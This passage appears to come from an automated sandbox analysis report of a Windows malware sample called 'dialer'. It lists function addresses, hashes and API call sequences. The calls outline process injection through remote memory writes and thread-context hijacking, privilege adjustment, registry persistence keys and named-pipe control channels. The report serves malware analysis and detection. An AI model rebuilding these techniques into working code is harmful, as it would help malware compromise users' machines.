                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Heap$AllocEnum$BoundaryChangeCloseDeleteDescriptorFindLanguagesMemoryModulesNotificationOpenPreferredProcessesReadRestoreThread
                                                                          • String ID:
                                                                          • API String ID: 2219672174-0
                                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                          • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                                          Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                          • String ID:
                                                                          • API String ID: 3197395349-0
                                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                          • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                                          Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                                          • RtlAllocateHeap.NTDLL(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                            • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                            • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                            • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                            • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                            • Part of subcall function 00000001400014D8: FindCloseChangeNotification.KERNELBASE ref: 000000014000161D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                            • Part of subcall function 00000001400014D8: RtlDeleteBoundaryDescriptor.NTDLL ref: 000000014000163D
                                                                            • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                            • Part of subcall function 00000001400014D8: RtlRestoreThreadPreferredUILanguages.NTDLL ref: 0000000140001651
                                                                          • OpenProcess.KERNEL32 ref: 0000000140001859
                                                                          • TerminateProcess.KERNEL32 ref: 000000014000186C
                                                                          • CloseHandle.KERNEL32 ref: 0000000140001875
                                                                          • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Heap$AllocCloseEnumOpen$AllocateBoundaryChangeDeleteDescriptorFindHandleLanguagesMemoryModulesNotificationPreferredProcessesReadRestoreTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 3158079169-0
                                                                          • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                                          • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                                          • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                                          Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
                                                                          • String ID: .text$C:\Windows\System32\
                                                                          • API String ID: 1125510917-832442975
                                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                                          • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                                          • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                                          Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                                          • String ID: M$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2203880229-3489460547
                                                                          • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                                          • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                                          • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                                          Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 2071455217-3440882674
                                                                          • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                                          • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                                          • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                                          Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                          • String ID:
                                                                          • API String ID: 3676546796-0
                                                                          • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                                          • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                                          • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                                          Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb FindCloseChangeNotification 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ChangeCloseFindNotificationOpenWow64
                                                                          • String ID:
                                                                          • API String ID: 3805842350-0
                                                                          • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                          • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                          • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                          Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                          APIs
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                            • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                            • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                            • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                            • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                            • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                            • Part of subcall function 000000014000226C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                            • Part of subcall function 000000014000226C: FindResourceA.KERNEL32 ref: 000000014000232F
                                                                            • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                            • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                            • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                            • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                            • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                            • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                            • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                            • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                          • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Resource$Security$CurrentDescriptorFindOpenToken$AdjustChangeCloseConvertCreateErrorExitFreeLastLoadLocalLockLookupNotificationPrivilegePrivilegesSizeofStringValue
                                                                          • String ID:
                                                                          • API String ID: 2373407002-0
                                                                          • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                          • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                          • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                                          Non-executed Functions

                                                                          Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
                                                                          • String ID: SOFTWARE$dialerstager$open
                                                                          • API String ID: 4281403370-3931493855
                                                                          • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                          • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                          • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                          • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                          Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                          • String ID: @
                                                                          • API String ID: 3462610200-2766056989
                                                                          • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                          • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                          • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                          Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                          • String ID: dialersvc64
                                                                          • API String ID: 4184240511-3881820561
                                                                          • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                          • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                          • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                          Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Delete$CloseEnumOpen
                                                                          • String ID: SOFTWARE\dialerconfig
                                                                          • API String ID: 3013565938-461861421
                                                                          • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                          • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                          • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                          Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: File$Write$CloseCreateHandle
                                                                          • String ID: \\.\pipe\dialercontrol_redirect64
                                                                          • API String ID: 148219782-3440882674
